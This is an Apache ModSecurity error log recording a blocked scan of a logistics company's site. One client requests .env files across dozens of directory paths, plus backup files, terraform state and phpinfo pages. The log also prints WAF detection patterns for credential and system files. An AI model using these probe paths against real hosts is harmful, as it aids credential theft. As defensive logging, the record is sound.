[Tue May 26 14:48:51.314090 2026] [security2:error] [pid 648203:tid 648309] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/php.php"] [unique_id "ahVle7EQDDtxJNiDrdTekAAAyWk"]
[Tue May 26 14:48:51.316435 2026] [security2:error] [pid 648203:tid 648213] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/php_info.php"] [unique_id "ahVle7EQDDtxJNiDrdTekQAAkgk"]
[Tue May 26 14:48:51.323157 2026] [security2:error] [pid 648203:tid 648327] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/phpinfo.php"] [unique_id "ahVle7EQDDtxJNiDrdTekwABAHs"]
[Tue May 26 14:48:51.338980 2026] [security2:error] [pid 648203:tid 648324] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/portal/.env"] [unique_id "ahVle7EQDDtxJNiDrdTelQAAmHg"]
[Tue May 26 14:48:51.343994 2026] [security2:error] [pid 648203:tid 648291] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/prod/.env"] [unique_id "ahVle7EQDDtxJNiDrdTemAABA1c"]
[Tue May 26 14:48:51.348208 2026] [security2:error] [pid 648203:tid 648320] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/product/.env"] [unique_id "ahVle7EQDDtxJNiDrdTemgAAtXQ"]
[Tue May 26 14:48:51.365580 2026] [security2:error] [pid 648203:tid 648215] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/production/.env"] [unique_id "ahVle7EQDDtxJNiDrdTemwAAvQs"]
[Tue May 26 14:48:51.458996 2026] [security2:error] [pid 648203:tid 648230] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/project/.env"] [unique_id "ahVle7EQDDtxJNiDrdTeowAAwRo"]
[Tue May 26 14:48:51.460322 2026] [security2:error] [pid 648203:tid 648328] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/public-api/.env"] [unique_id "ahVle7EQDDtxJNiDrdTepQAAwXw"]
[Tue May 26 14:48:51.462103 2026] [security2:error] [pid 648203:tid 648222] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/public/.env"] [unique_id "ahVle7EQDDtxJNiDrdTepgAAwRI"]
[Tue May 26 14:48:51.464270 2026] [security2:error] [pid 648203:tid 648228] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/public/phpinfo.php"] [unique_id "ahVle7EQDDtxJNiDrdTepwAA6xg"]
[Tue May 26 14:48:51.484267 2026] [security2:error] [pid 648203:tid 648330] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/public_html/.env"] [unique_id "ahVle7EQDDtxJNiDrdTeqQAA1n4"]
[Tue May 26 14:48:51.485378 2026] [security2:error] [pid 648203:tid 648232] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/qa/.env"] [unique_id "ahVle7EQDDtxJNiDrdTeqwAA1hw"]
[Tue May 26 14:48:51.779714 2026] [security2:error] [pid 648203:tid 648280] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/s3/.env.bak"] [unique_id "ahVle7EQDDtxJNiDrdTe1wAA4Uw"]
[Tue May 26 14:48:51.903605 2026] [security2:error] [pid 648203:tid 648267] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/server/api/.env"] [unique_id "ahVle7EQDDtxJNiDrdTe6QAA9j8"]
[Tue May 26 14:48:51.903733 2026] [security2:error] [pid 648203:tid 648252] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/server/.env"] [unique_id "ahVle7EQDDtxJNiDrdTe6AAA9jA"]
[Tue May 26 14:48:51.912710 2026] [security2:error] [pid 648203:tid 648270] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/server/backend/.env"] [unique_id "ahVle7EQDDtxJNiDrdTe6wAA_EI"]
[Tue May 26 14:48:52.047984 2026] [security2:error] [pid 648203:tid 648249] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/service/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTe_AAA9S0"]
[Tue May 26 14:48:52.049092 2026] [security2:error] [pid 648203:tid 648292] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/services/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTe_QAA9Vg"]
[Tue May 26 14:48:52.071664 2026] [security2:error] [pid 648203:tid 648306] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/shared/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfBwABAmY"]
[Tue May 26 14:48:52.073316 2026] [security2:error] [pid 648203:tid 648296] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/shop/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfCAABAlw"]
[Tue May 26 14:48:52.193050 2026] [security2:error] [pid 648203:tid 648302] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/src/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfFQAA5mI"]
[Tue May 26 14:48:52.228930 2026] [security2:error] [pid 648203:tid 648313] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/stage/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfIgAA1m0"]
[Tue May 26 14:48:52.229053 2026] [security2:error] [pid 648203:tid 648297] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/srv/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfIQAA1l0"]
[Tue May 26 14:48:52.231292 2026] [security2:error] [pid 648203:tid 648395] [client 176.65.139.236:45488] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.medlivon.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfIwAAAMM"]
[Tue May 26 14:48:52.240821 2026] [security2:error] [pid 648203:tid 648456] [client 176.65.139.234:58612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.ameritradeng.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfJAAAAQA"]
[Tue May 26 14:48:52.250603 2026] [security2:error] [pid 648203:tid 648294] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/staging/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfJQAA1Vo"]
[Tue May 26 14:48:52.343534 2026] [security2:error] [pid 648203:tid 648205] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/stg/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfLQAAxQE"]
[Tue May 26 14:48:52.366983 2026] [security2:error] [pid 648203:tid 648312] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/stripe/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfNQAAo2w"]
[Tue May 26 14:48:52.374563 2026] [cgid:error] [pid 648203:tid 648213] [remote 195.178.110.199:55984] AH01264: stderr from /home2/onesomzc/public_html/www.landsonlogistics.com/sysinfo.cgi: script not found or unable to stat
[Tue May 26 14:48:52.458290 2026] [security2:error] [pid 648203:tid 648427] [client 216.26.246.18:16397] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVle7EQDDtxJNiDrdTenAAAAOM"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:52.489041 2026] [security2:error] [pid 648203:tid 648210] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVlfLEQDDtxJNiDrdTfPQAA2QY"]
[Tue May 26 14:48:52.493344 2026] [security2:error] [pid 648203:tid 648319] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/test.php"] [unique_id "ahVlfLEQDDtxJNiDrdTfQgAA0nM"]
[Tue May 26 14:48:52.497876 2026] [security2:error] [pid 648203:tid 648388] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlfLEQDDtxJNiDrdTfBAAAALw"]
[Tue May 26 14:48:52.499204 2026] [security2:error] [pid 648203:tid 648320] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/test/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfQwAA-HQ"]
[Tue May 26 14:48:52.513139 2026] [security2:error] [pid 648203:tid 648318] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/user/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfSgAAt3I"]
[Tue May 26 14:48:52.520467 2026] [security2:error] [pid 648203:tid 648326] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/v1/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfTAAA1Ho"]
[Tue May 26 14:48:52.542274 2026] [security2:error] [pid 648203:tid 648330] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/v2/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfUgAA4X4"]
[Tue May 26 14:48:52.587125 2026] [security2:error] [pid 648203:tid 648232] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/v3/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfVAAA3Rw"]
[Tue May 26 14:48:52.783277 2026] [security2:error] [pid 648203:tid 648221] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/var/www/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfZgAA_hE"]
[Tue May 26 14:48:52.786414 2026] [security2:error] [pid 648203:tid 648331] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/web/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfagAA6n8"]
[Tue May 26 14:48:52.786411 2026] [security2:error] [pid 648203:tid 648250] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/var/www/html/.env"] [unique_id "ahVlfLEQDDtxJNiDrdTfZwAA6i4"]
